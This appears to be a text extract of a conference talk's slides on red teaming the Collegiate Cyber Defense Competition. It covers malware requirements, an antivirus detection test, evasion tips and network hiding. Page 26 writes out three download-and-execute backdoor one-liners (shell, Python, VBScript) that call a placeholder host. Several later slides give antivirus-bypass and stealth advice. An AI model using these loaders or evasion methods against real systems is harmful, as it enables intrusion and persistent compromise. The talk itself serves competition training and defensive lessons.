54
Red Teaming the CCDC hacking the most paranoid student system administrators in the nation Matt “scriptjunkie” Weeks

Red teaming the CCDC

Embed Size (px)

DESCRIPTION

 

Citation preview

Page 1: Red teaming the CCDC

Red Teaming the CCDChacking the most paranoid student system administrators in the nation

Matt “scriptjunkie” Weeks

Page 2: Red teaming the CCDC

Some funny thingsOur mistakes and yours

Page 3: Red teaming the CCDC

No, don’t start “aCcbsXoAIfRsU”

Page 4: Red teaming the CCDC

Those other people logged-in are not

your friends.

Page 5: Red teaming the CCDC

You planned to get hacked?

Page 7: Red teaming the CCDC
Page 8: Red teaming the CCDC
Page 9: Red teaming the CCDC
Page 10: Red teaming the CCDC
Page 11: Red teaming the CCDC
Page 12: Red teaming the CCDC
Page 13: Red teaming the CCDC
Page 14: Red teaming the CCDC

A year of curating red team wallpaper

Page 15: Red teaming the CCDC
Page 16: Red teaming the CCDC

Gotta keep up with changing memes

Page 17: Red teaming the CCDC

The red team has you

Page 18: Red teaming the CCDC
Page 19: Red teaming the CCDC

Screenshot inception!

Page 20: Red teaming the CCDC
Page 21: Red teaming the CCDC

Personal Favorite

https://www.youtube.com/watch?v=TrnUO6TLrtE

Page 22: Red teaming the CCDC

The malware gamesChallenges writing malware

Page 23: Red teaming the CCDC

Requirements

Full-featured RAT

File access

Interactive shell

Screenshots, keylogger

May include stealth features

Basic backdoors

Used for re-establishing full-featured RAT

Simple command and/or shellcode execution

Callback or listening

Keylogger/persistent monitoring

File packing tools

Worms – every method possible

Page 24: Red teaming the CCDC

Compatibility is hard

Windows XP – Win 8.1

Hook-based keylogging fails…

*NIX’s

Make Windows look great

No two Linux distros startup the same

OS X(!)

NetBSD

OpenBSD

FreeBSD

X64/x86

OpenIndiana (Solaris)

Ubuntu

Fedora

Linux Mint

Page 25: Red teaming the CCDC

But hard work pays off, kids

Page 26: Red teaming the CCDC

On-the-fly backdoors

Usually you are caught off-guard with at least one system

Webshell collections are your friend

Scripting skills are a must

while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done

eval(urllib2.urlopen('http://a.bc/def').read())

echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open

"GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs

Page 27: Red teaming the CCDC

First world red team problems:

I accidentally six or seven keylogger copies

Page 28: Red teaming the CCDC

On Antivirus

-or-

why does

everybody

use MBAM?

Page 29: Red teaming the CCDC

Process

Write malware

Does AV detect?

YesLook for

shady code

Obfuscate functions,

stringsDone!

No

Page 30: Red teaming the CCDC

But usually

Write malware

Does AV detect?

Done!

No

Page 31: Red teaming the CCDC

AV test lab

Top market share AV’s (Internet Security Suite version) on default settings

7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)

Page 32: Red teaming the CCDC

Why not VirusTotal?

Page 33: Red teaming the CCDC

Test 1: Widely known malware

with 1 byte appended

The only way to fail is by using giant hash lists instead of real signatures

FAIL

WIN

FAIL

WINFAIL

FAILFAILFAIL

WIN WIN WIN

WIN

Page 34: Red teaming the CCDC

Test 2: Malware with public code

samples

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAIL

Page 35: Red teaming the CCDC

Test 3: One-off malware with no

evasions

FAIL FAIL

FAIL

FAIL

FAIL FAIL INDECISIVE

FAIL

WINWIN

WININDECISIVE

Page 36: Red teaming the CCDC

Test 4: “Chris’s Ex-Girlfriend” – Highly

evasive malware workhorse

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAIL

Page 37: Red teaming the CCDC

Test 5: “The Kraken” – Sneaky firewall-

evading malware

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL

FAIL

WIN

Page 38: Red teaming the CCDC

Test 6: Worm with no evasions

FAIL FAIL

FAIL FAIL FAIL

FAIL

WIN WINFAIL

Hosed VMFAILFAIL

Page 39: Red teaming the CCDC

Test 7: Legit program used maliciously

FAIL FAIL

FAIL

FAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAILINDECISIVE

Page 40: Red teaming the CCDC

Notes

Symantec was only AV to detect reverse meterpreter on the wire

Kaspersky’s behavioral emulation detected one worm well

Kaspersky and Comodo both recognized at least one piece of malware as

unusual, (not on whitelist) but not necessarily bad

Trend Micro was only AV to block hash dumping

Panda, Avast gave errors installing and were not tested

Page 41: Red teaming the CCDC

Final standings

100% FAIL

meh

100% FAIL

TIED 1st100% FAIL

100% FAILFAILFAIL

meh TIED 1st 3rd

meh

Page 42: Red teaming the CCDC

Just kidding. After 2 hours obfuscating,

these are the real final standings:

FAIL FAIL

FAIL

FAILFAILFAIL

FAIL FAIL FAIL FAIL FAIL

FAIL

Page 43: Red teaming the CCDC

How do I bypass AV?

Write your own stuff

Dynamically resolve API calls

Obfuscate strings

Introduce environmental/system dependencies to generically thwart sandboxing

Write your own stuff

Impersonate legitimate software

Watch what hits disk

Digitally sign your stuff if you can

Write your own stuff

Page 44: Red teaming the CCDC

Security Software Lessons

Some AV’s are a total fail

MalwareBytes Pro is in this list with MS, McAfee, F-Secure

Many have one really cool feature or heuristic

Kaspersky, Symantec, Trend Micro

All can be bypassed easily for most malware

Only detection remaining after 2 hours was one worm vs Kaspersky

Page 45: Red teaming the CCDC

Hiding from the students

Page 46: Red teaming the CCDC

Hiding from the students

Host hiding

Hide while running

Hide start

Meterpreter is great for functionality, bad for persistence

Mostly custom malware

Mostly standard persistence methods

Don’t run in your own process

Don’t use any of those toy languages with dependencies

Use C!

Page 47: Red teaming the CCDC

Don’t hide stuff rootkit finders look for

Page 48: Red teaming the CCDC

Don’t sweat the one-offs

Page 49: Red teaming the CCDC

Hiding on the wires

Hiding from Wireshark

Harder than hiding on host

Try to blend in with normal traffic

Throw Wireshark crashers

Remove packets from view

Hiding from netstat/tcpview

Using HTTP(S) instead of TCP callbacks doesn’t leave connection open

If that fails, blend in by using common ports and cloud IP’s

Migrate session to web browser or critical process

Page 50: Red teaming the CCDC

Hiding on the wires

Use every protocol that gets out

TCP

UDP

HTTPS

DNS

Use hop points in cloud/web hosting

Use file sharing/paste/social media sites

Random callback selection and delays to avoid monitors

Any way students can send or receive info, you can too

Page 51: Red teaming the CCDC

Dealing with firewalls

Two types

Host

Network

Host firewalls

Usually don’t stop outbound traffic

Can go underneath, watch raw packets

Frequently add exceptions or drop the firewall

Page 52: Red teaming the CCDC

Network firewalls

Great to own

Tough if you don’t

Use service ports since

they must be able to

reach the hosts

Page 53: Red teaming the CCDC

Defenses that hurt

Patch or block RCE’s

Strict inbound and outbound network firewall rules

Traffic monitoring

Different passwords on all the boxes

Pull the plug

Reverting (sometimes)

Realizing that sometimes, the red team can’t hurt you as much as finishing

injects helps you

Page 54: Red teaming the CCDC

Questions

@scriptjunkie1

https://scriptjunkie.us/